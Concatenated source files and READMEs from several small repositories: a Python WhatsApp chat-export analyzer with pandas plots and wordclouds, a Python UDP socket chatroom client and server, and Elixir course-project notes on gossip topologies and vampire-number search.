in_file.readline()\n next_line = in_file.readline()\n\n out_file.write(\"datetime|author|message\\n\")\n\n if is_apple:\n while next_line:\n\n if \"‎\" in this_line:\n this_line = next_line\n next_line = in_file.readline()\n continue\n\n valid_next_line: bool = (\n next_line.count(\"[\") == 1 and\n next_line.count(\"]\") == 1 and\n next_line.split(\"] \", 1)[0].count(\":\") == 2\n )\n\n if not valid_next_line:\n this_line = this_line.replace(\"\\n\", \"__n__\") + next_line.replace(\"\\n\", \"__n__\") + \"\\n\"\n next_line = in_file.readline()\n continue\n\n this_line = this_line.replace(\"|\", \"__x__\")\n this_line = this_line.replace(\"*\", \"__a__\")\n this_line = this_line.replace('\"', \"__vv__\")\n this_line = this_line.replace(\"'\", \"__v__\")\n this_line = this_line.replace(\"“\", \"__vv__\")\n\n if \"PM\" in this_line.split(\"] \", 1)[0]:\n hour_str = this_line.split(\", \", 1)[1].split(\":\", 1)[0]\n hour = int(hour_str)\n if hour != 12:\n hour += 12\n\n this_line = this_line.split(\", \", 1)[0] + \", \" + str(hour) + \":\" + 
this_line.split(\":\", 1)[1]\n this_line = this_line.replace(\"PM\", \"AM\", 1)\n\n this_line = this_line.replace(\"[\", \"\", 1) \\\n .replace(\", \", \" \", 1)\\\n .replace(\" AM] \", \"|\", 1)\\\n .replace(\": \", \"|\", 1)\n\n out_file.write(this_line)\n\n this_line = next_line\n next_line = in_file.readline()\n else:\n while next_line:\n\n if \"‎\" in this_line or this_line.count(\":\") < 2 or \"Hai cambiato l'oggetto da “\" in this_line:\n this_line = next_line\n next_line = in_file.readline()\n continue\n\n valid_next_line: bool = (\n next_line.split(\",\", 1)[0].count(\"/\") == 2\n )\n\n if not valid_next_line:\n this_line = this_line.replace(\"\\n\", \"__n__\") + next_line.replace(\"\\n\", \"__n__\") + \"\\n\"\n next_line = in_file.readline()\n continue\n\n this_line = this_line.replace(\"|\", \"__x__\")\n this_line = this_line.replace(\"*\", \"__a__\")\n this_line = this_line.replace('\"', \"__vv__\")\n this_line = this_line.replace(\"“\", \"__vv__\")\n this_line = this_line.replace(\"'\", \"__v__\")\n\n this_line = this_line.replace(\", \", \" \", 1) \\\n .replace(\" - \", \":00|\", 1) \\\n .replace(\": \", \"|\", 1)\n\n out_file.write(this_line)\n\n this_line = next_line\n next_line = in_file.readline()\n return out_file_path\n\n\ndef load_data_frame(file_path: str, is_apple: bool) -> pd.DataFrame:\n\n # If the backup .frames folder does not exist, I create one\n if not path.isdir(\"../chats/.frames\"):\n os.mkdir(\"../chats/.frames\")\n\n # The backup file has the same name as the original but is .zip file and is\n # saved in the .frames folder\n dataframe_file_path = file_path.replace(\".txt\", \"\") + \".zip\"\n dataframe_file_path = dataframe_file_path.replace(\"chats/\", \"chats/.frames/\")\n\n if path.isfile(dataframe_file_path): # if the file exists it needs to be pickled\n\n print(\"LOADING BACKUP..\")\n beginning = dt.datetime.now()\n df = pd.read_pickle(dataframe_file_path)\n print(\"It took\", (dt.datetime.now() - beginning).microseconds / 
1000, \"ms to load the pickled dataset\")\n\n beginning = dt.datetime.now()\n print(\"It took\", (dt.datetime.now() - beginning).microseconds / 1000, \"ms to create the df_info dictionary\")\n\n print(\"BACKUP LOADED\")\n\n else: # Otherwise, we have to create the dataframe and store is as a pickle file\n\n print(\"CREATING CSV FORMATTED FILE\")\n beginning = dt.datetime.now()\n temp_file_path = file_to_csv_format(file_path, is_apple) # Transforms the input file into a csv file\n print(\"It took\", (dt.datetime.now() - beginning).microseconds / 1000, \"ms to create the CSV file\")\n\n print(\"LOADING DATAFRAME FROM CSV\")\n beginning = dt.datetime.now()\n df = pd.read_csv(temp_file_path, sep=\"|\") # Reads the csv into a dataframe\n print(\"It took\", (dt.datetime.now() - beginning).microseconds / 1000, \"ms to create the CSV file\")\n\n df = df_setup(df)\n\n os.remove(temp_file_path) # Deletes the csv file because it's not helpful anymore\n\n beginning = dt.datetime.now()\n df.to_pickle(dataframe_file_path) # Pickles the dataframe into a zip file and saves it\n print(\"It took\", (dt.datetime.now() - beginning).microseconds /1000, \"ms to pickle the dataframe\")\n\n print(\"BACKUP SAVED AT\", dataframe_file_path)\n\n print(\"FRAME LOADED\")\n print_separator_line()\n print_separator_line()\n return df\n\n\ndef print_example(file_path: str, n: int):\n print(\"An example of the dataframe\")\n with open(file_path, \"r\") as file:\n i = 0\n for i in range(n):\n print(file.readline())\n" }, { "alpha_fraction": 0.6174089312553406, "alphanum_fraction": 0.6315789222717285, "avg_line_length": 37, "blob_id": "8e5b7a1da3642884d9e6cd98411c2147f93cf758", "content_id": "385f7873bf2d581146eba80c8c341316b3c2032f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1482, "license_type": "no_license", "max_line_length": 96, "num_lines": 39, "path": "/src/main.py", "repo_name": "andreaalf97/whatsapp_analysis", "src_encoding": 
"UTF-8", "text": "import src.dataframe_analysis as analysis\nfrom src.file_handler import print_example, load_data_frame\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nif __name__ == '__main__':\n\n pd.set_option('display.max_colwidth', 300)\n\n # Reading the file path from the user input\n # file_path: str = input(\"Insert the name of the chat you want to analyze:\")\n # file_path = \"../chats/\" + file_path + \".txt\"\n # while not path.isfile(file_path):\n # print(\"NOT AN EXISTING PATH\")\n # file_path: str = input(\"Insert the name of the chat you want to analyze:\")\n # file_path = \"../chats/\" + file_path + \".txt\"\n #\n # # Reading if the file is a iOS file from the user input\n # is_apple_input: str = input(\"Is the chat file generated from an iOS device?\")\n # is_apple: bool = (is_apple_input == \"y\" or is_apple_input == \"Y\" or is_apple_input == \"1\")\n\n file_path = \"../chats/Sara_Gotti.txt\"\n is_apple = False\n\n df = load_data_frame(file_path, is_apple)\n\n # filtered = analysis.filter(df, words_or=[\"hu\", \"Hu\", \"HU\"])\n # print(filtered[[\"author\", \"message\"]])\n\n analysis.df_general_info(df)\n # analysis.df_length_info(df)\n # analysis.df_plot_month_year(df, start=\"03-2015\", end=\"12-2015\")\n # analysis.df_plot_month_year(df, auto=True)\n analysis.df_plot_year(df)\n # analysis.df_plot_days(df, auto=True)\n # analysis.df_emojis(df)\n # analysis.df_words(df)\n\n # analysis.df_month_analysis(df, month=\"5\", year=\"2020\")\n" }, { "alpha_fraction": 0.681073009967804, "alphanum_fraction": 0.6959761381149292, "avg_line_length": 18.735294342041016, "blob_id": "70d50bd80c782f621ad6dcc3c8d4e1158365c1f6", "content_id": "90785c3e785314d962e61cd476ab5d9727d1c3fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 686, "license_type": "no_license", "max_line_length": 59, "num_lines": 34, "path": "/README.md", "repo_name": "andreaalf97/whatsapp_analysis", "src_encoding": 
"UTF-8", "text": "# WhatsApp Analysis\nA data analysis and visualization tool for WhatsApp chats\n\n## Example\nHere's and example of what these scripts are able to create\n\n### Plots\n**Different plots for different timeperiods**\n![](example_images/timeperiod.png)\n![](example_images/all_years.png)\n\n**Overall and per author emoji counters**\n\nFriend:<br>\n😂 -- 43<br>\n👍 -- 30<br>\n🎉 -- 30<br>\n🎩 -- 27<br>\n😏 -- 17\n\n![](example_images/emojis.png)\n\n## Wordclouds\n**Overall**\n![](example_images/overall_words.png)\n\n**Someone really enjoying himself**\n![](example_images/be.png)\n\n**Someone who is always happy**\n![](example_images/lo.png)\n\n**Someone who barely shows up**\n![](example_images/will.png)\n" }, { "alpha_fraction": 0.5501395463943481, "alphanum_fraction": 0.5654883980751038, "avg_line_length": 32.489097595214844, "blob_id": "9d51477cfb5f6d5e92d479756d2a5009c5822d42", "content_id": "cfaec32ccfebf429570e48a7c095000413da02b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10750, "license_type": "no_license", "max_line_length": 184, "num_lines": 321, "path": "/src/dataframe_analysis.py", "repo_name": "andreaalf97/whatsapp_analysis", "src_encoding": "UTF-8", "text": "import pandas as pd\n\nfrom src import misc\nfrom src.misc import print_separator_line\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport wordcloud\nfrom stop_words import get_stop_words\nimport emojis\nfrom operator import add\n\n\ndef df_general_info(df: pd.DataFrame):\n\n counts = {author: len(frame) for author, frame in df.groupby(df[\"author\"])}\n\n print(\"There are\", len(counts), \"different authors in this chat\")\n\n for author in counts:\n print(author, \"has written\", counts[author], \"messages\")\n\n print_separator_line()\n\n print(\"You have exchanged\", str(len(df)), \" messages between \", str(df.iloc[0].datetime), \"and\", str(df.iloc[-1].datetime))\n\n print_separator_line()\n\n 
print(len(df[df.isMedia == False]), \"text objects\")\n print(len(df[df.isMedia == True]), \"media objects\")\n\n\ndef df_length_info(df: pd.DataFrame):\n index_longest = df.length.sort_values().index[-1]\n index_shortest = df.length.sort_values().index[0]\n\n print(\"Shortest message is #\" + str(index_shortest) + \" with a length of \" + str(\n len(df.iloc[index_shortest].message)) + \":\")\n print(df.iloc[index_shortest].message)\n\n print_separator_line()\n\n print(\"Longest message is #\" + str(index_longest) + \" with a length of \" + str(\n len(df.iloc[index_longest].message)) + \":\")\n print(df.iloc[index_longest].message)\n\n\ndef bar(x: list, y: list, xlabel, ylabel, color='b', rotation='vertical'):\n\n if type(y[0])==list:\n for i in range(len(y)):\n plt.bar(x, y[i], align='center')\n else:\n plt.bar(x, y, align='center', color=color)\n plt.xticks(rotation='vertical')\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.show()\n\n\ndef df_plot_month_year(df: pd.DataFrame, start=\"01-2000\", end=\"12-2050\", auto=False):\n\n if auto:\n max_size = 0\n for year, frame in df.groupby(df[\"datetime\"].dt.year):\n if len(frame) > max_size:\n max_size = len(frame)\n max_year = int(year)\n start = \"06-\" + str(max_year-1)\n end = \"06-\" + str(max_year+1)\n print(\"Max year is\", max_year)\n\n start = dt.datetime.strptime(start, \"%m-%Y\")\n end = dt.datetime.strptime(end, \"%m-%Y\")\n\n dates = []\n counts = []\n\n for frame in df.groupby([df[\"datetime\"].dt.year, df[\"datetime\"].dt.month]):\n\n if frame[1].iloc[0][\"datetime\"] < start or frame[1].iloc[0][\"datetime\"] > end:\n continue\n\n # frame[0] contains (year, month)\n # frame[1] contains the full dataframe with those years and months only\n dates.append(str(frame[0][0]) + \"-\" + str(frame[0][1]))\n counts.append(len(frame[1]))\n\n bar(dates, counts, \"Date\", \"Total number of messages\", color='r')\n\n\ndef df_plot_year(df: pd.DataFrame):\n dates = []\n counts_per_author = {}\n\n for author in 
df_get_author_list(df):\n counts_per_author[author] = []\n\n for year, year_frame in df.groupby(df[\"datetime\"].dt.year):\n dates.append(str(year))\n for author, frame in year_frame.groupby(year_frame[\"author\"]):\n counts_per_author[author].append(len(frame))\n\n tots = [0 for x in dates]\n for author in counts_per_author:\n counts_per_author[author] = list(map(add, counts_per_author[author], tots))\n tots = counts_per_author[author]\n plt.bar(dates, counts_per_author[author], label=author)\n\n plt.xlabel(\"Year\")\n plt.ylabel(\"Total number of messages\")\n plt.legend()\n plt.show()\n\n\ndef df_emojis(df: pd.DataFrame, n=5):\n\n print(\"EMOJI ANALYSIS\")\n\n author_counters = {}\n all_emojis = {}\n\n for author in df_get_author_list(df):\n author_counters[author] = {}\n\n for row in df.iterrows():\n emoji_list = row[1][\"emojis\"]\n author = row[1][\"author\"]\n\n if emoji_list:\n for emoji in emoji_list:\n if emoji in author_counters[author]:\n author_counters[author][emoji] += 1\n else:\n author_counters[author][emoji] = 1\n if emoji in all_emojis:\n all_emojis[emoji] += 1\n else:\n all_emojis[emoji] = 1\n\n all_emojis = {k: v for k, v in sorted(all_emojis.items(), reverse=True, key=lambda item: item[1])}\n print(\"OVERALL:\")\n i = 1\n for emoji in all_emojis:\n if i > n:\n break\n print(emoji, \"--\", all_emojis[emoji])\n i += 1\n\n bar(\n [emojis.decode(k) for k in list(all_emojis.keys())[:(n*2)]],\n [all_emojis[k] for k in list(all_emojis.keys())[:(n*2)]],\n \"Emojis\",\n \"Number of times used\",\n rotation=''\n )\n\n for author in author_counters:\n author_counters[author] = {k: v for k, v in sorted(author_counters[author].items(), reverse=True, key=lambda item: item[1])}\n print(author)\n i = 1\n for emoji in author_counters[author]:\n if i > n:\n break\n print(emoji, \"--\", author_counters[author][emoji])\n i += 1\n\n\ndef df_words(df: pd.DataFrame, title=\"\"):\n\n full_string = \" \".join([str(row[1][\"message\"]).replace(\"\\n\", \" \").lower() 
for row in df.iterrows() if row[1][\"message\"]!=\"<Media omessi>\"])\n authors = df_get_author_list(df)\n\n full_string_authors = {}\n for author in authors:\n full_string_authors[author] = \" \".join([str(row[1][\"message\"]).replace(\"<Media omessi>\", \"\").replace(\"\\n\", \" \").lower() for row in df.iterrows() if row[1][\"author\"] == author])\n\n stopwords = get_stop_words(\"it\")\n\n wc = wordcloud.WordCloud(\n stopwords=stopwords,\n # width=1000,\n # height=500,\n background_color=\"white\"\n )\n\n wc.generate(full_string)\n plt.axis(\"off\")\n plt.imshow(wc, interpolation=\"bilinear\")\n plt.title(title + \" | \" + \"OVERALL\")\n plt.show()\n\n for author in full_string_authors:\n wc.generate(full_string_authors[author])\n plt.axis(\"off\")\n plt.imshow(wc, interpolation=\"bilinear\")\n plt.title(title + \" | \" + author)\n plt.show()\n\n\ndef df_setup(df: pd.DataFrame) -> pd.DataFrame:\n\n # Creates the 'isMedia' column\n df[\"message\"] = df[\"message\"].astype(str)\n beginning = dt.datetime.now()\n df[\"isMedia\"] = df.apply(lambda row: row[\"message\"].find(\"<Media omessi>\") != -1, axis=1)\n print((dt.datetime.now() - beginning).microseconds / 1000, \"ms to create the isMedia column\")\n\n # 14/06/15 12:52:00\n beginning = dt.datetime.now()\n df[\"datetime\"] = pd.to_datetime(df[\"datetime\"], format=\"%d/%m/%y %H:%M:%S\")\n print((dt.datetime.now() - beginning).microseconds / 1000, \"ms to convert 'datetime' from string\")\n\n beginning = dt.datetime.now()\n df[\"isMedia\"] = df[\"isMedia\"].astype(bool)\n df[\"author\"] = df[\"author\"].astype(str)\n print((dt.datetime.now() - beginning).microseconds / 1000, \"ms to convert column types\")\n\n beginning = dt.datetime.now()\n df[\"message\"] = df.apply(lambda row:\n row[\"message\"].replace(\"__x__\", \"|\")\n .replace(\"__a__\", \"*\")\n .replace(\"__vv__\", '\"')\n .replace(\"__v__\", \"'\"), axis=1\n )\n print((dt.datetime.now() - beginning).microseconds / 1000, \"ms to reformat the 'message' 
column\")\n\n beginning = dt.datetime.now()\n df[\"emojis\"] = df.apply(lambda row: emojis.get(row[\"message\"]), axis=1)\n print((dt.datetime.now() - beginning).microseconds / 1000, \"ms to create the 'emojis' column\")\n\n beginning = dt.datetime.now()\n df[\"length\"] = df.apply(lambda row: len(row[\"message\"]), axis=1)\n print((dt.datetime.now() - beginning).microseconds / 1000, \"ms to create the 'length' column\")\n\n return df\n\n\ndef df_month_analysis(df, month=\"0\", year=\"0\"):\n\n if month == '0' and year == '0':\n max_size = 0\n for date_i, frame_i in df.groupby([df[\"datetime\"].dt.year, df[\"datetime\"].dt.month]):\n if len(frame_i) > max_size:\n max_size = len(frame_i)\n month = date_i[1]\n year = date_i[0]\n frame = frame_i\n print(\"The month you talked the most is \" + str(month) + \"-\" + str(year))\n else:\n frame = df[\n (df[\"datetime\"].dt.year==int(year)) &\n (df[\"datetime\"].dt.month==int(month))\n ]\n print(\"There have been\", len(frame), \"messages in \" + month + \"-\" + year)\n\n df_words(frame, title=\"What you talked about on \" + str(month) + \"-\" + str(year))\n\n\ndef df_filter(df: pd.DataFrame,\n words=[],\n words_or=[],\n authors=[],\n start_date=\"30/03/2000 18:00\",\n end_date=\"30/03/2050 18:00\") -> pd.DataFrame:\n\n condition = ((df[\"datetime\"] > dt.datetime.strptime(start_date, \"%d/%m/%Y %H:%M\")) &\n (df[\"datetime\"] < dt.datetime.strptime(end_date, \"%d/%m/%Y %H:%M\")))\n\n if words:\n for word in words:\n condition = ((condition) & df[\"message\"].str.contains(word))\n if words_or:\n words_condition = 0\n for word in words_or:\n words_condition = ((words_condition) | (df[\"message\"].str.contains(word)))\n condition = (condition) & (words_condition)\n\n if authors:\n author_condition = 0\n for author in authors:\n author_condition = (author_condition) | (df[\"author\"].str.contains(author))\n condition = (condition) & (author_condition)\n\n return df[condition]\n\n\ndef df_plot_days(df, start=\"01/03/2020\", 
end=\"01/04/2020\", auto=False):\n\n if auto:\n max_len = 0\n for (year, month), frame in df.groupby([df[\"datetime\"].dt.year, df[\"datetime\"].dt.month]):\n if len(frame) > max_len:\n max_len = len(frame)\n max_year = year\n max_month = month\n print(\"Max month is \" + str(max_month) + \"-\" + str(max_year))\n last_day = misc.get_last_day_of_month(max_month)\n start = \"01/\" + str(max_month) + \"/\" + str(max_year)\n end = str(last_day) + \"/\" + str(max_month) + \"/\" + str(max_year)\n # 23/03/2020\n\n start = dt.datetime.strptime(start, \"%d/%m/%Y\")\n end = dt.datetime.strptime(end, \"%d/%m/%Y\")\n\n filtered_df = df_filter(\n df,\n start_date=start.strftime(\"%d/%m/%Y %H:%M\"),\n end_date=end.strftime(\"%d/%m/%Y %H:%M\")\n )\n\n dates = []\n counts = []\n for date, frame in filtered_df.groupby([df[\"datetime\"].dt.year, df[\"datetime\"].dt.month, df[\"datetime\"].dt.day]):\n dates.append(str(date[2]) + \"-\" + str(date[1]))\n counts.append(len(frame))\n\n bar(dates, counts, \"Day\", \"Total number of messages\")\n\n\ndef df_get_author_list(df: pd.DataFrame) -> list:\n return [author for author in df[\"author\"].value_counts().index]\n" }, { "alpha_fraction": 0.299539178609848, "alphanum_fraction": 0.3963133692741394, "avg_line_length": 17.08333396911621, "blob_id": "ce9916f7fd9c33f558dc7d64dbe7ac1f404b20e2", "content_id": "9635d5e8d964d63344401989856a21f8ea9a6827", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 434, "license_type": "no_license", "max_line_length": 57, "num_lines": 24, "path": "/src/misc.py", "repo_name": "andreaalf97/whatsapp_analysis", "src_encoding": "UTF-8", "text": "def print_separator_line():\n print(\"===============================\")\n\n\ndef get_last_day_of_month(month: int) -> int:\n cases = {\n 1: 31,\n 2: 28,\n 3: 31,\n 4: 30,\n 5: 31,\n 6: 30,\n 7: 31,\n 8: 31,\n 9: 30,\n 10: 31,\n 11: 30,\n 12: 31\n }\n\n if month not in cases:\n raise Exception(\"Month must be between 
1 and 12\")\n\n return cases[month]\n" } ]
5
xiaoxiaoxiaoxuan1028/socket-chatroom
https://github.com/xiaoxiaoxiaoxuan1028/socket-chatroom
c2cac42831100e37acd7c87a2c19154649ace1e5
527f00d388eae63433b29474c514090ec06f4190
e91598376fd4c250ee94268e1b181fd0d1194220
refs/heads/master
2020-12-08T00:32:05.742955
2020-01-09T15:09:45
2020-01-09T15:09:45
232,836,142
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7857142686843872, "alphanum_fraction": 0.7857142686843872, "avg_line_length": 26.5, "blob_id": "c5f6284873b9aed7f214118938525da3357ec2ce", "content_id": "d5e93b3cb8374f28038779135f228e1994d1c8b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 56, "license_type": "no_license", "max_line_length": 36, "num_lines": 2, "path": "/README.md", "repo_name": "xiaoxiaoxiaoxuan1028/socket-chatroom", "src_encoding": "UTF-8", "text": "# socket-chatroom\nchat room based on the python socket \n" }, { "alpha_fraction": 0.46327272057533264, "alphanum_fraction": 0.5032727122306824, "avg_line_length": 22.122806549072266, "blob_id": "1129defe58174e3da2f3d128fd846183136ed24b", "content_id": "cd40e660cc8fd1e6ccc6bcdad7a597a51c1e4209", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1539, "license_type": "no_license", "max_line_length": 69, "num_lines": 57, "path": "/client.py", "repo_name": "xiaoxiaoxiaoxuan1028/socket-chatroom", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n__author__ = '22920172204299'\r\n__date__ = '2019/11/06'\r\nimport socket\r\nimport threading\r\n\r\n\r\ndef recv(sock, addr):\r\n '''\r\n 一个UDP连接在接收消息前必须要让系统知道所占端口\r\n 也就是需要send一次,否则win下会报错\r\n “ data=sock.recv(1024)\r\n OSError: [WinError 10022] 提供了一个无效的参数。 ”\r\n '''\r\n #sock.sendto(name.encode('utf-8'), addr)\r\n while True:\r\n data = sock.recv(1024)\r\n print(data.decode('utf-8'))##\r\n\r\n\r\ndef send(sock, addr):\r\n while True:\r\n string = input()\r\n message = name + ' : ' + string\r\n data = message.encode('utf-8')\r\n sock.sendto(data, addr)\r\n if string == 'EXIT':\r\n break\r\n\r\n\r\ndef main():\r\n\r\n tr = threading.Thread(target=recv, args=(s, server), daemon=True)\r\n ts = threading.Thread(target=send, args=(s, server))\r\n tr.start()\r\n ts.start()\r\n ts.join()\r\n s.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n s = 
socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n server = ('127.0.0.1', 9998)\r\n\r\n print(\"-----欢迎来到聊天室,退出聊天室请输入'EXIT'-----\")\r\n name = input('请输入你的名称:')\r\n\r\n while True: \r\n s.sendto(name.encode('utf-8'), server) \r\n data = s.recv(1024) \r\n if data.decode('utf-8') == 'false': \r\n name = input('昵称被占用,请重新输入:') \r\n else: \r\n break \r\n\r\n print('-----------------%s------------------' % name)\r\n main()\r\n" }, { "alpha_fraction": 0.4019336998462677, "alphanum_fraction": 0.4330110549926758, "avg_line_length": 28.808509826660156, "blob_id": "f51921d039a1657771e548a6b4045ef24485d446", "content_id": "7f10848d7bdba7219dd4611c4e73062ffe968b51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1470, "license_type": "no_license", "max_line_length": 69, "num_lines": 47, "path": "/server.py", "repo_name": "xiaoxiaoxiaoxuan1028/socket-chatroom", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n__author__ = '22920172204299'\r\n__date__ = '2019/11/06'\r\n\r\nimport socket\r\nimport threading\r\n\r\n\r\ndef main():\r\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n addr = ('127.0.0.1', 9998)\r\n s.bind(addr)\r\n print('UDP Server on %s:%s...', addr[0], addr[1])\r\n\r\n user = {} # {addr:name}\r\n while True:\r\n try:\r\n data, addr = s.recvfrom(1024)\r\n if not addr in user:\r\n if data.decode('utf-8') in user.values():\r\n s.sendto('false'.encode(), addr)\r\n continue\r\n else:\r\n s.sendto('true'.encode(), addr)\r\n for address in user:\r\n s.sendto(data + ' 进入聊天室...'.encode(), address)\r\n user[addr] = data.decode('utf-8')\r\n continue\r\n\r\n if 'EXIT' in data.decode('utf-8'):\r\n name = user[addr]\r\n user.pop(addr)\r\n for address in user:\r\n s.sendto((name + ' 离开了聊天室...').encode(), address)\r\n else:\r\n print('\"%s\" from %s:%s' %\r\n (data.decode('utf-8'), addr[0], addr[1]))\r\n for address in user:\r\n if address != addr:\r\n s.sendto(data, address)\r\n\r\n except 
ConnectionResetError:\r\n print('Someone left unexcept.')\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n" } ]
3
BobbyRobillard/distributed-systems
https://github.com/BobbyRobillard/distributed-systems
2ae85b49dc38e94276d466174a85de0220214162
b96f95150fb74cdfe7402dabf0eff960e379d2bd
8d9d6caf087fd09c885885f662538c4c29bed59e
refs/heads/master
2022-08-19T02:05:07.686120
2019-12-14T04:46:45
2019-12-14T04:46:45
204,712,752
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7709978222846985, "alphanum_fraction": 0.7731514573097229, "avg_line_length": 33.82500076293945, "blob_id": "a172506bcf1c08e030fcdac5c614804af25b90c5", "content_id": "ec9553eee3d7bf6767fb6a55d9a55671dae10184", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1393, "license_type": "no_license", "max_line_length": 80, "num_lines": 40, "path": "/proj2/Topologies.md", "repo_name": "BobbyRobillard/distributed-systems", "src_encoding": "UTF-8", "text": "# Topologies\n\n## Complete (full)\n\nA graph where every node is connected to all other nodes.\n\n## Linear (line)\n\nA graph where every node is arranged linearly and connected to direct neighbors.\n\n## RandPlanar (rand2D)\n\nA graph where every node is randomly placed on a uniform plane and connected to\nnodes within a certain distance.\n\n## Cubic (3Dtorus)\n\nA graph where nodes are arranged in cubic fashion and connected to neighbors,\nincluding those passing to the other side of the cube.\n\nThe implementation generates {x, y, z} coordinates in the form of a 3D matrix.\nNodes are connected where two coordinates are the same and the other differs by\none or wraps around to the other side.\n\n## Hexagonal (honeycomb)\n\nA graph where nodes are arranged in a hexagonal grid and connected to neighbors.\n\nThe implementation generates {x, y} coordinates in a 'skewed' fashion, where the\nx axis is horizontal and the y axis is slanted right. This calculates the\ncurrent ring of the hexagon (distance from center) and the normalized index\n(index in current ring) and uses the current wedge to determine {x, y}. 
Nodes\nare connected if the maximum distance along an {x, y, z} axis is one.\n\nSee <https://www.redblobgames.com/grids/hexagons/> for reference.\n\n## RandHexagonal (randhoneycomb)\n\nA graph where nodes are arranged in a hexagonal grid, as the above, and also\nconnected to a random node in the network.\n" }, { "alpha_fraction": 0.7253731489181519, "alphanum_fraction": 0.7388059496879578, "avg_line_length": 29.454545974731445, "blob_id": "142a597f396174f06fa8daac1d5b7034143b371f", "content_id": "11d8aaccf2a5ac7bbdf69b9cb8bbf4b3efb44877", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 670, "license_type": "no_license", "max_line_length": 94, "num_lines": 22, "path": "/proj2/README.md", "repo_name": "BobbyRobillard/distributed-systems", "src_encoding": "UTF-8", "text": "# Proj2\n\n**Team Members:**\n- Robert Robillard\n- William B. Anderson\n\n**Compile With:**\n- $ mix escript.build\n- $ ./proj2 <num_nodes> <topology> <algorithm>\n\n**What is Working:**\n- Everything\n\n**What is the largest network you managed to deal with for each type of\n topology and algorithm:**\n- We managed to run with 500 nodes in each topology in each algorithm.\nPast that it simply took too long to obtain results from given the time constraints.\nShould we have used a more powerful machine we probably could have pushed 1000 without issues.\n\n**Note:**\n- There are is an additional folder \"output_data\" which contains all the raw data\nand xlsx from which the graphs in our report are derived.\n" }, { "alpha_fraction": 0.4776536226272583, "alphanum_fraction": 0.75698322057724, "avg_line_length": 28.224489212036133, "blob_id": "87bdd7ae0b2f11e310838e490e2986268827734a", "content_id": "290f7894989fbb4f9ed2090ee870b90f50be34aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2864, "license_type": "no_license", "max_line_length": 145, "num_lines": 98, "path": 
"/proj1/README.md", "repo_name": "BobbyRobillard/distributed-systems", "src_encoding": "UTF-8", "text": "# Project 1 Readme\n\n**NOTE:** Please also see \"Vampire-Numbers.md\" for an explanation of how our vampire number finder works.\n\n1) **Group Members**\n - Robert C. Robillard: 4987-1906\n - William B. Anderson: 6695-8353\n - To run our code $cd into the proj1 folder and run $ mix run proj1.exs <starting_number> <ending_number>\n\n2) We used 3 worker actors, as that was all the cores I could afford to give my VM.\n\n3) We give each worker a near equal portion of tasks. So for 3 workers each receives 1/3 of the work.\n **Note:** I say \"near equal\" because sometimes the range isn't exactly divisible by 3 and the last worker\n gets to slack off and do slightly less. We determined this by using Dobra's recommendation of \"$ perf top\"\n to check when more time was being spent in the Kernel (message passing). We deemed that having each worker\n complete all it's work then respond was the best approach given the timeframe to complete to project.\n\n **Note:** Had we had more time we would have taken a slightly different approach, and had each worker complete\n a smaller subset of work and report when finished, then take another subset. 
Thus making sure no worker was ever idle.\n But, unfortunately other classes and commitments are a thing, and the time it would take to create that solutions couldn't be spent currently.\n\n4) Running \"$ mix run proj1.exs 100000 200000\" yields the following:\n102510 201 510\n104260 260 401\n105210 210 501\n105264 204 516\n105750 150 705\n108135 135 801\n110758 158 701\n115672 152 761\n116725 161 725\n117067 167 701\n118440 141 840\n120600 201 600\n123354 231 534\n124483 281 443\n125248 152 824\n125433 231 543\n125460 204 615 246 510\n125500 251 500\n126027 201 627\n126846 261 486\n129640 140 926\n129775 179 725\n131242 311 422\n132430 323 410\n133245 315 423\n134725 317 425\n135828 231 588\n135837 351 387\n136525 215 635\n136948 146 938\n140350 350 401\n145314 351 414\n146137 317 461\n146952 156 942\n150300 300 501\n152608 251 608\n152685 261 585\n153436 356 431\n156240 240 651\n156289 269 581\n156915 165 951\n162976 176 926\n163944 396 414\n172822 221 782\n173250 231 750\n174370 371 470\n175329 231 759\n180225 225 801\n180297 201 897\n182250 225 810\n182650 281 650\n186624 216 864\n190260 210 906\n192150 210 915\n193257 327 591\n193945 395 491\n197725 275 719\n\n5) The time run was obtained via \"$ time mix run proj1.exs 100000 200000\" and is:\n\n- real 0m0.733s\n- user 0m0.983s\n- sys 0m0.168s\n\n**Note:** Our vampire solving algorithm is very fast, to make real use of parallelism it's\nbest to run it with larger numbers. For instance, running \"$ time mix run proj1.exs 1000 10000000\" yields\nthe following:\n\n- real 0m20.314s\n- user 0m46.339s\n- sys 0m0.418s\n\n6) We solved up to 50,000,000. 
